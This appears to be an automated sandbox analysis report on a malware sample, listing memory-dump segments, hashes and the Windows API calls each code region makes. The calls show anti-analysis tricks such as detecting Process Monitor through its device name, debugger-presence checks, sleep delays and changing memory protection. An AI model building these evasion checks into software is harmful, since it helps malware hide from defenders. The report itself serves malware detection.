        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: A73930CloseCreateHandle$DebuggerF8030FilePresentProcessProcess32Sleep$A06610CheckCurrentEnumFirstModuleNameNextRemoteSnapshotToolhelp32Windows
        • String ID: %s$\\.\Global\ProcmonDebugLogger
        • API String ID: 1779379411-3094312819
        • Opcode ID: 0f68bcfa5780a08afdd3ca05e730463d2f6957eef74531cd2b4986f25b87efa6
        • Instruction ID: ada72b00efeddab77558a7526c9bfebc5c45dee81f49764202b5955a75b962b6
        • Opcode Fuzzy Hash: 0f68bcfa5780a08afdd3ca05e730463d2f6957eef74531cd2b4986f25b87efa6
        • Instruction Fuzzy Hash: 57D17835D083805BDB259B786C14FEA7B98AF57384F5C406DE5C98B253D630CA0A8B6F
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • Sleep.KERNELBASE(00003E80), ref: 009C15D5
        • 769F8030.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 009C15ED
        • EnumWindows.USER32(009C1200,00000000), ref: 009C16A3
        • CreateFileA.KERNELBASE(\\.\Global\ProcmonDebugLogger,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009C16C6
        • IsDebuggerPresent.KERNEL32 ref: 009C16D5
        • GetCurrentProcess.KERNEL32(?), ref: 009C1712
        • CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 009C1719
        • Sleep.KERNELBASE(00001388), ref: 009C184B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: DebuggerPresentSleep$CheckCreateCurrentEnumF8030FileProcessRemoteWindows
        • String ID: %s$\\.\Global\ProcmonDebugLogger
        • API String ID: 4101352749-3094312819
        • Opcode ID: d6b65bee2734c5dd0ae9e89588e18d0977430ffd3a52f47135fac2644b07a2e5
        • Instruction ID: cbdf7b25861d1a56f15afed598490b9c0cf32b11ffca0481ffa87f85ff57322b
        • Opcode Fuzzy Hash: d6b65bee2734c5dd0ae9e89588e18d0977430ffd3a52f47135fac2644b07a2e5
        • Instruction Fuzzy Hash: F9A12624D082C14ADF259B786864FFA7B985F973C4F5C556DE4C98B253C230CA0A8B6F
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • LoadLibraryA.KERNEL32(?), ref: 00A52A02
        • GetProcAddress.KERNEL32(?,00A50FF9), ref: 00A52A17
        • ExitProcess.KERNEL32(?,00A50FF9), ref: 00A52A28
        • VirtualProtect.KERNELBASE(009C0000,00001000,00000004,?,00000000), ref: 00A52A76
        • VirtualProtect.KERNELBASE(009C0000,00001000), ref: 00A52A8B
        Memory Dump Source
        • Source File: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
        • String ID:
        • API String ID: 1996367037-0
        • Opcode ID: 0a9b9c40e1c982ea33c66d63cfdf26bdcfeca49065fb87cfa55f30e58a1cd97d
        • Instruction ID: f907d3538bcf41fb058764092bf931132e4685ef5431ceb7d1fa839cb62b9778
        • Opcode Fuzzy Hash: 0a9b9c40e1c982ea33c66d63cfdf26bdcfeca49065fb87cfa55f30e58a1cd97d
        • Instruction Fuzzy Hash: 2F51F772A456128AD7205FB89CC07A077A0FB57362B280738DDE5C73C6E7B4580E87A0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002304,009C1C98), ref: 009C22FD
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 42a2ac55a010093cd51b804bc16f324e7e54a396bd689bb7bf23bd0bc81d69b3
        • Instruction ID: 332eeaaede42a233698e7383ae60a183ae52d68533aafec08f371c5ee6c18158
        • Opcode Fuzzy Hash: 42a2ac55a010093cd51b804bc16f324e7e54a396bd689bb7bf23bd0bc81d69b3
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009C21A1
        • 72A73930.VCRUNTIME140(?,00000000,00000003), ref: 009C21C7
        • 72A73930.VCRUNTIME140(?,00000000,00000050), ref: 009C2251
        • IsDebuggerPresent.KERNEL32 ref: 009C226D
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009C228D
        • UnhandledExceptionFilter.KERNEL32(?), ref: 009C2297
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: A73930ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
        • String ID:
        • API String ID: 3208604743-0
        • Opcode ID: 0d2ead4a9d31dfa6eb9a81eb67b764c2e7b522df5f5c3baac9baeae4414172d4
        • Instruction ID: dcfe038ec15d6b8a7e65d8f0f7c8794c9457c159177807bc8d4f6446b1c53fff
        • Opcode Fuzzy Hash: 0d2ead4a9d31dfa6eb9a81eb67b764c2e7b522df5f5c3baac9baeae4414172d4
        • Instruction Fuzzy Hash: 11314775D05318DBDB20DFA4D989BCDBBB8BF08300F1080AAE50DAB250EB749B859F05
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009C241B
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-0
        • Opcode ID: dafb2caf334583bd698b436826223945c07dd04c01d5894c814528d667ae6b90
        • Instruction ID: aa8fabfa11391e19e180264fa675bfc6f3417a2a23dd84365cbfe83f3414e9c6
        • Opcode Fuzzy Hash: dafb2caf334583bd698b436826223945c07dd04c01d5894c814528d667ae6b90
        • Instruction Fuzzy Hash: 7951D5B1E24A05CFDB18CF54D990BAAB7F4FB08350F15856ED405EB260E3B4A940DFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID: hXMV
        • API String ID: 0-2057747057
        • Opcode ID: 9cc351b032651000139ab13425930357b2ff9afc7b3ed273ab9d778da79feb9c
        • Instruction ID: 677679d34861a4d98f26a0a416ac1a7a0bf661f52e96095ac2e37bc102d8118e
        • Opcode Fuzzy Hash: 9cc351b032651000139ab13425930357b2ff9afc7b3ed273ab9d778da79feb9c
        • Instruction Fuzzy Hash: 86F0C872E48748AFD714CF59DD41F5BB7F8E785B24F20422EF415D76C0D635290086A1
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • 769FDD70.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 009C1BEE
        • __RTC_Initialize.LIBCMT ref: 009C1C12
          • Part of subcall function 009C2127: RtlInitializeSListHead.NTDLL(009C5358), ref: 009C212C
        • 76A80C70.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000211A), ref: 009C1C45
        • 769FBF20.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 009C1C60
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: Initialize$HeadList
        • String ID:
        • API String ID: 394358367-0
        • Opcode ID: 5beb8844c033e8d50f7e53368039c3bebd18b7181e99b2b0a6432f9fab83c878
        • Instruction ID: 737e2569fb07983d1f22da36fc12c8982cda8d73525b63431b1d56695dae2411
        • Opcode Fuzzy Hash: 5beb8844c033e8d50f7e53368039c3bebd18b7181e99b2b0a6432f9fab83c878
        • Instruction Fuzzy Hash: E4014965D8C20215ED247BF45A07F6E06882FD17A8F1C486FBB80AA183DD69C40283BF
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CreateFileA.KERNEL32(\\.\Global\ProcmonDebugLogger,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009C1337
        • CloseHandle.KERNEL32(00000000), ref: 009C1346
        Strings
        • \\.\Global\ProcmonDebugLogger, xrefs: 009C1332
        Memory Dump Source
        • Source File: 00000000.00000002.916945178.00000000009C1000.00000040.00020000.sdmp, Offset: 009C0000, based on PE: true
        • Associated: 00000000.00000002.916933269.00000000009C0000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.916962756.0000000000A51000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.916975933.0000000000A52000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.916990935.0000000000A53000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917001392.0000000000A5B000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917034672.0000000000A9A000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917058644.0000000000ABC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917075423.0000000000ACC000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.917091191.0000000000AD4000.00000004.00020000.sdmp Download File
        Similarity
        • API ID: CloseCreateFileHandle
        • String ID: \\.\Global\ProcmonDebugLogger
        • API String ID: 3498533004-2913090028
        • Opcode ID: e0e5d35f833853b68d08f5e2bbfc77cba98b6949d3e03fe1f0996f8eb6cbdc63
        • Instruction ID: 27af7c37ac0a67a9cfc7ec4cb472d6cb23bb5670605c11fc5c1c8d013529d48c
        • Opcode Fuzzy Hash: e0e5d35f833853b68d08f5e2bbfc77cba98b6949d3e03fe1f0996f8eb6cbdc63
        • Instruction Fuzzy Hash: 39D01271F98300B2FA701234AC0AF853908A742F26FA0C654F360F84E0CAE8A644A629
        Uniqueness

        Uniqueness Score: -1.00%